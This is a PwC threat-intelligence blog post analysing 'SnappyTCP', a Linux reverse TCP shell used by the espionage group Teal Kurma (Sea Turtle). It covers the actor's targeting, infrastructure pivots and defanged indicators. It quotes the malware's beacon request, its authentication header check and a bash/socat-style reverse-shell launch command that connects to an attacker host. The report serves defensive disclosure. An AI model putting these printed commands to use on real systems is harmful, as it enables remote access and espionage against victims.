The Tortoise and The Malwahare

By PwC Threat Intelligence

Revisiting an elusive espionage threat actor known as Teal Kurma (a.k.a. Sea Turtle) that faded after public disclosure over three years ago, by analyzing its malware dubbed 'SnappyTCP', a simple reverse shell for Linux/Unix systems

Executive summary

PwC has continued to track a highly capable Türkiye-nexus threat actor threat actor, known as Teal Kurma (a.k.a. Sea Turtle, Marbled Dust, Cosmic Wolf). As reported in our 2020 Year in Retrospect publication, Teal Kurma focuses primarily on targeting throughout Europe and the Middle East¹. Those targets are inclusive of both private and public sector organizations, from non-governmental organizations (NGO) to information technology (IT) and telecommunication sectors. The threat actor has since continued to target similar sectors but has altered its capabilities in a likely attempt to evade detection.

In this blog, we will detail Linux/Unix malware samples previously not discussed publicly that PwC has named “SnappyTCP”. The following are the key points of our analysis:

• Between 2021 and 2023, the threat actor has used SnappyTCP, a simple reverse TCP shell for Linux/Unix that has basic C2 capabilities and is also used for establishing persistence on a system;
• There are at least two main variants; one which uses plaintext communication and the other which uses TLS for a secure connection;
• The threat actor has highly likely used code from a publicly accessible GitHub account, and we assess with realistic probability that this account is currently controlled by the threat actor; and,
• Pivoting on infrastructure associated with the threat actor, we identified multiple domains resolving throughout 2023 that are spoofing NGOs and Media organizations, both of which are consistent with this threat actor's targeting motivations. These motivations center on conducting espionage for the collection of information that can then be exploited for surveillance purposes, or to gather traditional intelligence about the activities of specific targets.
  

Background

Teal Kurma, a Türkiye-nexus threat actor², was highly active between 2018 and 2020 before seemingly disappearing from open source reporting.^{3, 4} At the time of this heightened activity, the threat actor was involved in conducting large scale and prolonged Domain Name Server (DNS) hijacking attacks. DNS hijacking is when a threat actor manipulates how DNS queries are resolved, resulting in users being redirected to malicious websites. Since then, Teal Kurma has altered its tactics to include additional tools, which are still in use at present, to achieve its espionage focused actions on objectives.

SnappyTCP

According to open source research, the threat actor has historically focused on exploiting vulnerabilities for initial access since at least 2017⁵. We assess that Teal Kurma has likely continued leveraging major CVEs in its current campaigns, particularly ones with publicly available proof-of-concept code such as CVE-2021-44228, CVE-2021-21974, and CVE-2022-0847. Once inside a network, the threat actor runs a shell script (upxa.sh) that drops an executable to disk which calls out to a threat actor controlled web server.

The webshell is a simple reverse TCP shell for Linux/Unix that has basic C2 capabilities, and is also likely used for establishing persistence. There are at least two main variants; one which uses OpenSSL to create a secure connection over TLS, while the other omits this capability and sends requests in cleartext.

The above sample is an example of the non-TLS variant, in which the malware first opens a file named "conf" and reads the first 256 bytes into a buffer and then parses an IP from that buffer. The IP connects via a TCP socket by sending the following command:

GET /sy.php HTTP/1.1\r\nHost: %s\r\nHostname: %s\r\n\r\n", host_name, host_name 

The domain hosting the mentioned sy.php file was observed on the following URL, as early as July 2021, hxxp://lo0[.]systemctl[.]network/sy.php. This also happens to be a subdomain mentioned in a 2022 Greek CERT alert for malicious activity indicating its potential use over a sustained period⁶. Many of the other network indicators from that CERT alert are assessed to be related to SnappyTCP activity, and proved useful for pivoting on to find more recent infrastructure from 2023, as discussed below.

The malware then checks for the substring "X-Auth-43245-S-20" in the HTTP request, and then checks for "\r\n\r\n", before spawning the TCP reverse shell. The reverse shell is created using a pthread which launches the following:

bash -c \\"./kdd_launch exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:%s:%d 2>&1>/dev/null&\\"

An example of what the HTTP network response looks like, can be seen in the following data capture output:

• User-Agent: curl/7.29.0
• Host: lo0[.]systemctl[.]network
• Accept: */*
• %HTTP/1.1 200 OK
• Date: [Omitted]
• Server: Apache/2.4.6 (CentOS) PHP/5.4.16
• X-Powered-By: PHP/5.4.16
• X-Auth-43245-S-20: True
• Content-Length: 45
• Content-Type: text/html
• charset=UTF-8
• curl [Threat Actor IP Addresses]
• python

Taking a closer look at additional samples, we can see a minor difference than those already mentioned.

In the other samples, which use OpenSSL and TLS certificates for a more secure connection, the malware connects to an IP parsed from the conf file and sends:

Additional malware insights

We observed that many of the binaries for SnappyTCP are often compiled with different toolchains, as shown in Table 1. Additionally, the GNU C Library (GLIBC) has been observed statically linked into the binary which offers the malware developer the ability to keep everything self contained while not needing to link against the library files directory on the target machine. The method for running the code differed, with some cases having a final output as an executable or a shared object file.

Table 1 – Overview of build artifacts for several SnappyTCP samples

Since the properties of an ELF file do not have compile dates, we could not link the variations in toolchain (e.g., Architecture types, Operating Systems, etc) usage to an evolution of the malware over time. There are at least two possible reasons for the variations, which are not necessarily mutually exclusive. One potential theory for the wide variation in toolchains is that there are multiple developers compiling malware for the threat actor. The second theory is that the samples are compiled by one developer, but they are cross-compiling source code for different architectures. The first theory could speak to the scale of operations, while the second theory lends more towards the threat actor's specific targeting needs.

In our analysis we also discovered that the reverse TCP shell has practically identical code to a publicly accessible GitHub repository.⁷ The code observed on GitHub has only one slight difference in the TLS variant seen with Teal Kurma. The executable called by the pthread that spawns a bash process in Teal Kurma’s sample is called ‘update’ instead of ‘connector’ as seen in the GitHub repository.

Further observations show other samples in the repository that are used to establish reverse shells, either over TCP or UDP, often containing IP addresses suspected of being associated with Teal Kurma activity. It is unclear if the threat actor controls this account or is simply abusing a third party's code. Given the overlaps between both the code and IP addresses, there is a realistic probability that the threat actor is in control of this account at present. It is highly plausible that the threat actor is also using other code observed on this GitHub, particularly some of the proof-of-concept exploit code for major vulnerabilities, such as CVE-2021-21974 or a ESXi OpenSLP heap-overflow vulnerability.

Infrastructure

In addition to analyzing the mentioned samples, we pivoted on the HTTP GET request of SnappyTCP and the previously mentioned open source reporting on Sea Turtle, including the 2022 Greek CERT alert, to find more suspected Teal Kurma infrastructure. For example, one of the observed HTTP GET requests matched with hxxp://108.61.103[.]186/sy.php. Pivoting on the 2022 CERT infrastructure also proved useful in identifying additional and recent infrastructure, such as the domain ybcd[.]tech. According to pDNS records for that domain, the following infrastructure is linked and still active at the time of writing: 168.100.10[.]187 and 93.115.22[.]212.

Figure 1 – Some of the pivots made to identify additional and more recent infrastructure

As we continued to map out this infrastructure, we noticed several suspicious TLS certificates and associated names which correspond to domains spoofing very particular organizations. The below table shows that the domain names spoof organizations operating in both the Media and NGO sectors. All of which are catering to audiences within the Middle East, and in some cases, specific regional or ethnic groups.

Table 2 – Suspicious TLS certificates observed via pivoting

Motives and Targets

The motivation for this threat actor is almost certainly to collect information that can further some type of economic or political interest, but the focus is on conducting espionage.⁸ The use of the described reverse shell is to assist the threat actor in its overall actions on objectives of collecting and exfiltrating sensitive data. A closer look at victimology helps to assess the type of data sets this threat actor is interested in.

The threat actor focuses on targeting governments, telecommunication, and IT service providers. Each one of these sectors hold a variety of high value information. For example, organizations in the telecommunication sector hold data on its customers, which depending on the provider, may be metadata around connections to websites, or call logs. While technology companies themselves may be targeted in supply chain and island hopping attacks, particularly where they provide services (including IT and cyber security) to customers. This kind of information can then be exploited by the threat actor for surveillance purposes, or to gather traditional intelligence about the activities of specific targets.

Additional sector targeting that aligns with such purposes include the NGO and Media & Entertainment sector, both of which this threat actor has also shown an interest in, according to the mentioned TLS certificates. Geographically, the targeting assessed off the TLS certificates shows the Middle East and North Africa region, while some of the SnappyTCP activity is highly likely focused on European countries, particularly those located in the Mediterranean. This described targeting helps support attribution of the threat actor, in addition to providing insights into its priority relevance for organizations that might be operating in a similar geography or sector.

Recommendations

PwC recommends searching historical logs and configuring alerting for the indicators or detection content provided in this blog. If any of these indicators are discovered, or detection content generates alerts, we recommend organisations investigate their origin and conduct forensic analysis. If there are no significant findings, we recommend blocking the provided malicious indicators.

Overview of TTPs

More detailed information on each of the techniques used in this blog, along with detection and mitigations, can be found on the following MITRE pages:

Appendix A – Indicators of compromise